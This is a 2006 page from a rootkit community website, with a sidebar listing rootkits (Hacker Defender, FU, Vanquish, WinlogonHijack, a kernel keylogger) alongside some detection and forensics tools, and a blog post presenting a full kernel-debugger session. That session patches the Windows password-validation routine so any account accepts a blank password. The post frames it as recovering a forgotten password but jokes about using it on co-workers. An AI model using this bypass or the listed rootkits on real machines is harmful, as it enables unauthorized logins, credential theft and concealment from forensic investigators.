REGISTER

main menu

home

forums
    Show me new threads!

bookmarks

post article

view blogs

vault

you must be level 2 to upload files to your vault

downloads

you must be logged to access downloads
search the site

projects:

Hacker Defender
This is the Hacker Defender rootkit for Windows. This is more of a 'blackhat' tool than a training example. It is the most popular and wide spread rootkit today.
description | homepage
message board

HE4Hook
This is the Russian rootkit, HE4HOOK. This code is very complete.
description | download
message board

BASIC CLASS
This is the set of basic windows rootkits used for training purposes in the class 'Offensive Aspects of Rootkit Technology'. Good for starters.
description
message board

Vanquish
Vanquish is a DLL injection based Romanian rootkit that hides files, folders, registry entries and logs passwords.
description | changelog | download
message board

NT Rootkit
The original and first public NT ROOTKIT - has not been updated for many years but is good for ideas.
description | download
message board

FU
The FU rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that forensics is impossible, and even hide device drivers (NEW!) All this without any hooking.
description | changelog | download
message board

WinlogonHijack
Winlogonhijack injects a dll into winlogon.exe and hooks msgina.WlxLoggedOutSAS, logging every login in plaintext.
description | changelog | download
message board

klister
klister is a simple set of utilities for Windows 2000, designed to read the internal kernel data structures, in order to get reliable information about the system state (like list of all processes, including those "hidden" by rootkits, even by 'fu').
description | download
message board

Patchfinder2
Patchfinder implements Execution Path Analysis technique for Windows 2000 systems. EPA is intended to detect various kernel and DLL rookits in the system.
description | changelog | download
message board

MyNetwork
An ethernet bridge / VPN program for windows.
description | download
message board

MTDWin
A driver that will identify writable memory chips / FlashRAM / EEPROM on the motherboard.
description
message board

NTFSHider
A driver that stores data in 'bad blocks' or unallocated clusters on an IDE drive/NTFS partition.
description
message board

VideoCardKit
A driver that can store executable code in a FLASH or EEPROM and submit this code to be executed from the video processor in order to patch kernel memory.
description
message board

VICE
VICE - Catch hookers! VICE is a tool to find hookers!
description | download
message board

Klog
Klog demonstrates how to use a kernel filter driver to implement a simple key logger.
description | download
message board

NtIllusion
A portable Win32 userland rootkit.
NtIllusion is an userland rootkit for win 2000/XP systems. It uses Dll injection and API entry point rewriting to perform its stealth. This is more a proof of concept than a true hax0r tool.
description | homepage | changelog
message board

AFX Rootkit 2005
This OPEN SOURCE Delphi rootkit uses code injection and hooks Windows native API to hide processes, modules, handles, files, ports, registry keys, etc.
description | homepage | download
message board

SInAR
A Cross architecture Solaris rootkit the development of which is aimed to both increase understanding of the Solaris OS and to show that it's not just the external threats that a Solaris Admin should worry about.
description | homepage
message board

Shadow Walker
Shadow Walker as seen at Black Hat and Phrack 63.
description
message board

BootRootkit (eEye)
eEye BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-b
description | homepage | download
message board

CHAZ - Nima Bagheri
"Chaz" is a tool that allows network administrators and Manegements to quickly and easily perform a network security audit. Chaz By "Nima Bagheri"
description | homepage | changelog | download
message board

Clandestine File System Driver
Cfsd is a driver project for misrepresenting and protecting various aspects of the underlying file systems.
description | homepage | changelog | download
message board

FUTo
FUTo is the successor of FU.
description | download
message board

Windows Memory Forensic Toolkit
Windows Memory Forensic Toolkit (WMFT) is a collection of utilities intended for forensic use. WMFT can be used to perform forensic analysis of physical memory images acquired from Windows 2003/XP machines.
description | homepage | download
message board

RAIDE
RAIDE stands for Rootkit Analysis Identification Elimination. RAIDE is a rootkit detection/removal tool.
description | download
message board

 

backends
A news back-end to implement RootKit news into your website is here or more advanced version here.

An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.

[Valid RSS]

Bypassing your testbox's login password
Aug 10 2006, 10:21 (UTC+0)
bugcheck writes: After living out of a duffle bang for 2 months now i've finally got all my stuff back and have settled into a new apartment and finally have dev PC's again, W00h00! So this isnt the first have had to do this to recover an install with a forgotten password but figured id share it incase you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am I always pick those unique but easy to remember passwords that of course ill never forget, use it once and shelf the image for months at a time and then of course, forget it. In my case today its my dev box!!! Luckly i had been using it as a test machine when i first got it so i happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course its not as cool as this! =P It doesnt reset it but at least you can log in again...

Happy debugging,
Chris

kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe

kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ?? ???
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'

kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present.

kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp

kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3

kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p

kd> g

read comments (5) / write comment

recent comments:
possibility to erase it on-disktoto2213.Aug:05:26
woohoo2rossettoecioccolato11.Aug:00:34
woohoo !MohammadHosein10.Aug:15:33

printer-friendly version

login:
password:

The Software Security Boxed Set
By: McGraw, Viega, and Hoglund

Get the premiere collection of titles on software security.

Software Security: Building Security In
By: Gary McGraw

Get Gary's new book! Beginning where the best-selling book Building Secure Software left off, Software Security teaches you how to put software security into practice.


logged users

active for last 5 minutes


Normal user
__MaX__

Untrusted stranger
ort

registered users:50013

There are currently 2 registered users and 11 guests browsing the website.

Welcome our latest registered user: ort

recent board posts
subject author date
Hooking Wi... cools Oct / 16
Spoof pack... ljoel Oct / 15
PEB questi... wang111222 Oct / 15
NEED HELP gamesoldier34 Oct / 14
Need help ... questions Oct / 14
Use ZwQuer... hsly110 Oct / 14
How to Use gamesoldier34 Oct / 13
safer hack... majimojo Oct / 13
how bypass... cosuroca Oct / 12
send signa... daos Oct / 12
send signa... daos Oct / 12
send signa... daos Oct / 12
hii brij Oct / 11
how make o... cosuroca Oct / 10
SEH not ca... linden Oct / 08

recently replied posts
subject author date
Hooking Wi... bugcheck Oct/16
Ring 0 Ent... redskin Oct/16
ACPI BIOS ... gory Oct/16
Use ZwQuer... warl0ck Oct/16
Spoof pack... bugcheck Oct/15
NtAllocate... bugcheck Oct/15
PEB questi... Orkblutt Oct/15
NEED HELP metro_mystery Oct/14
hii zeroknock Oct/14
how bypass... zeroknock Oct/14
SEH not ca... zeroknock Oct/14
Need help ... zeroknock Oct/14
How to Use Kurt123 Oct/14
safer hack... majimojo Oct/14

recent blog entries
hoglund Oct 13, 07:29
hoglund Oct 08, 11:59
phew Oct 04, 13:36
bugcheck Oct 04, 09:54
hoglund Oct 03, 18:10
Best Screenshots / Analog
Oct 02, 2006

punked.jpg /

click on the picture to enlarge and see description

GOT TO LOVE ie6 ohday

read comments (0)
write comment

view archive(76) :

Analog(42) / Best Screenshots(34)

submit a picture to gallery

the most active news users
based on the number of news posts for last 30 days

user nr. of posted news
SC_Modder 1
admin 1

select skin



"I can't believe it!", says Luke.
"That is why you fail", responds Yoda.